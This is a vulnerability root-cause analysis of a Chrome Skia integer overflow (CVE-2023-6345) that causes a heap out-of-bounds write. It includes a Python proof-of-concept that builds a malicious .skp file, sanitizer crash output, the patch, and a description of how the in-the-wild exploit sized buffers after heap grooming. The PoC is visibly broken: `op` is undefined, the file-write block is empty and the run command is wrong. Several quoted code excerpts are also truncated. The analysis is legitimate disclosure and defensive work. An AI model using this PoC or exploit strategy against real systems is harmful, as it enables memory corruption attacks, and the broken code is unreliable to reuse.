Benoît Sevens and Clement Lecigne

The Basics

Disclosure or Patch Date: November 28, 2023

Product: Google Chrome


Affected Versions: Versions older than 119.0.6045.199

First Patched Version: 119.0.6045.199

Issue/Bug Report:

Patch CL:

Bug-Introducing CL:

Reporter(s): Benoît Sevens and Clément Lecigne of Google's Threat Analysis Group

The Code


Compile Skia with ASAN. The following Python script will create a poc.skp in the current directory:

import struct
import sys

kSkBlenderInSkPaint = 87
kXor = 11
sizeof_SkPoint = 8
sizeof_uint16_t = 2
kHasTexs_Mask = 0x100
kPictureData_TrailingStreamByteAfterPictInfo = 1
INT32_MAX = (1 << 31) - 1

vertexCount = 1 << 16  # Optimized to have as small as possible output .skp
indexCount = 0
name = b'poc'

def p32(x):
    return struct.pack("<I", x)

def p8(x):
    return bytes([x])

def f32(x):
    return struct.pack("<f", x)

def tag(s):
    return s.encode()[::-1]

info = b'skiapict'
info += p32(kSkBlenderInSkPaint)  # SkPictInfo.fVersion
info += f32(0)  # SkRect.fLeft
info += f32(0)  # SkRect.fTop
info += f32(30)  # SkRect.fRight
info += f32(30)  # SkRect.fBottom
info += p8(kPictureData_TrailingStreamByteAfterPictInfo)

factory = tag('fact')
factory += p32(1)  # size
factory += p32(1)  # SkFactoryPlayback size
factory += p8(len(name)) 
factory += name

paint_buffer = tag('pnt ')
paint_buffer += p32(1)  # size
paint_buffer += f32(1)  # SkPaint.fWidth
paint_buffer += f32(0)  # SkPaitn.fMiterLimit
paint_buffer += f32(255)  # SkColor4f.fR
paint_buffer += f32(255)  # SkColor4f.fG
paint_buffer += f32(255)  # SkColor4f.fB
paint_buffer += f32(0)  # SkColor4f.fA
paint_buffer += p32(0)  # flatFlags

vertices_buffer = tag('vert')
vertices_buffer += p32(1)  # size

vertices_buffer += p32(kHasTexs_Mask) 
vertices_buffer += p32(vertexCount)
vertices_buffer += p32(indexCount)
fVSize = vertexCount * sizeof_SkPoint  # positions
fTSize = vertexCount * sizeof_SkPoint  # texCoords
fCSize = 0  # colors
fISize = indexCount * sizeof_uint16_t  # indices
vertices_buffer += p32(fVSize)
positions = b''
for _ in range(2):  # We need at least 2 distinct points to not bail out early.
    positions += f32(1)
positions += f32(0) * ((fVSize - len(positions)) // 4)
vertices_buffer += positions
for size in [fTSize, fCSize, fISize]:
    vertices_buffer += p32(size)
    vertices_buffer += b'\0' * size

buffer_size = tag('aray')
buffer_size += p32(len(paint_buffer) + len(vertices_buffer))

reader = tag('read')
op_size = 16
reader_op = p32((op << 24) + op_size)
reader_op += p32(1)  # paint
reader_op += p32(1)  # vertices
reader_op += p32(0)  # boneCount
reader_op += p32(kXor)  # bmode
reader_ops = reader_op * (INT32_MAX // vertexCount + 1)  # The "+ 1" will trigger the overflow
reader += p32(len(reader_ops))
reader += reader_ops

eof = tag('eof ')

with open(sys.argv[1], 'wb') as f:

Generate and parse the Skia picture with the following commands:

$ python3 poc.skp
$ ./skia/out/asan/skpbench --src poc.skp --config gles
   accum    median       max       min   stddev  samples  sample_ms  clock  metric  config    bench  
../../src/gpu/ganesh/ops/DrawMeshOp.cpp:1225:18: runtime error: signed integer overflow: 2146435072 + 1048576 cannot be represented in type 'int'  
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../../src/gpu/ganesh/ops/DrawMeshOp.cpp:1225:18 in   

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Integer overflow leading to a heap out of bounds write

Vulnerability details:

When Skia draws a Skia picture ("skp"), MeshOp::onCombineIfPossible will be called if multiple DRAW_VERTICES_OBJECT operations are performed (see proof of concept code for an example). MeshOp::onCombineIfPossible tries to combine the current MeshOp with the next MeshOp ("that"). This function will perform a few sanity checks and if they pass, it will extend fMeshes with those of the other MeshOp ([1]), as well as increment the fVertexCount and fIndexCount with those of the other MeshOp ([2]).

GrOp::CombineResult MeshOp::onCombineIfPossible(GrOp* t, SkArenaAlloc*, const GrCaps& caps) {
    auto that = t->cast<MeshOp>();


    fMeshes.move_back_n(that->fMeshes.size(), that->fMeshes.begin());  // [1]
    fVertexCount += that->fVertexCount;  // [2]
    fIndexCount  += that->fIndexCount;
    return CombineResult::kMerged;

However no sanity check is performed to verify that the addition at [1] will not overflow, with fVertexCount being defined as a int, which is 32-bit in this case.

Later on in MeshOp::onPrepareDraws, a skgpu::VertexWriter verts is allocated based on the (potentially overflowed) fVertexCount ([3]). A skgpu::VertexWriter is a specialized version of a skgpu::BufferWriter. GrMeshDrawTarget::makeVertexWriter will allocate a backing buffer by calling GrOpFlushState::makeVertexSpace. The size of the vertex buffer is eventually calculated in GrVertexBufferAllocPool::makeSpace by multiplying the vertexStride with the fVertexCount.

void MeshOp::onPrepareDraws(GrMeshDrawTarget* target) {
    size_t vertexStride = fSpecification->stride();
    sk_sp<const GrBuffer> vertexBuffer;
    int firstVertex;
    std::tie(vertexBuffer, firstVertex) = fMeshes[0].gpuVB();
    if (!vertexBuffer) {
        skgpu::VertexWriter verts = target->makeVertexWriter(vertexStride,  // [3]
        if (!verts) {
            SkDebugf("Could not allocate vertices.\n");
        bool transform = fViewMatrix == SkMatrix::InvalidMatrix();
        for (const auto& m : fMeshes) {
            m.writeVertices(verts, *fSpecification, transform);  // [4]

Finally, for every mesh of fMeshes, the vertices are then written to verts ([4]). Since this time the vertices are taken from the individual fMeshes, it can overflow the previously allocated buffer if fVertexCount has overflowed.

Note that writes to a skgpu::VertexWriter are validated:

    void validate(size_t bytesToWrite) const {
        // If the buffer writer had an end marked, make sure we're not crossing it.
        // Ideally, all creators of BufferWriters mark the end, but a lot of legacy code is not set
        // up to easily do this.
        SkASSERT(fPtr || bytesToWrite == 0);
        SkASSERT(!fEnd || Mark(fPtr, bytesToWrite) <= fEnd);  // [5]

At [5] the out of bounds write will be caught on debug builds. However on release builds, SkAssert calls are compiled out.

Patch analysis:

The patch verifies that the addition of fVertexCount and that->fVertexCount will not overflow.

+    if (fVertexCount > INT32_MAX - that->fVertexCount) {
+        return CombineResult::kCannotCombine;
+    }

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

Both fuzzing and code auditing are viable ways to find this vulnerability.

(Historical/present/future) context of bug: Another integer overflow in Skia, tracked as CVE-2023-2136 and in a different component, was found exploited in the wild a few months earlier.

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

In contrast with the above proof of concept, the exploit has two entries in the vertices buffer, one with a fVertexCount of A and a second one with a fVertexCount of B. The first DRAW_VERTICES_OBJECT operation refers to A and the N next operations refer to B. A and B are chosen so that:

(A + N * B) % INT_MAX < A

The left hand side of the equation will be the overflown allocated size, while the right hand side will be the number of bytes written in the first writeVertices call. By using two vertices buffer, the values A, B and N can be finetuned to have the buffer land in the right heap location (after some heap grooming) and overflow the neighboring object with the desired amount.

Exploit flow: N/A

Known cases of the same exploit flow:

Exploits for CVE-2023-2136 and CVE-2023-6345 used the same technique to reach Skia from within the Chrome renderer (i.e. by using a DrawSlugOp command).

Part of an exploit chain? This sandbox escape would typically be chained with a renderer exploit before and an LPE exploit after.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why): Analyse similar patterns in other onCombine... functions of other operations.

Found variants: None

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

Some memory safe languages would detect such integer overflows at runtime.

Otherwise, use of overflow checking functions or macros for additions/substractions (instead of raw additions/substractions), would also mitigate such bugs. Such functions are actually used in some places in Skia, such as here. Of course, using such functions consistently thoughout the codebase is prone to errors.

Ideas to mitigate the exploit flow:

Hardware memory tagging technologies, such as Arm MTE, will detect the heap buffer out of bounds accesses.

Other potential improvements: N/A

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day? N/A

Other References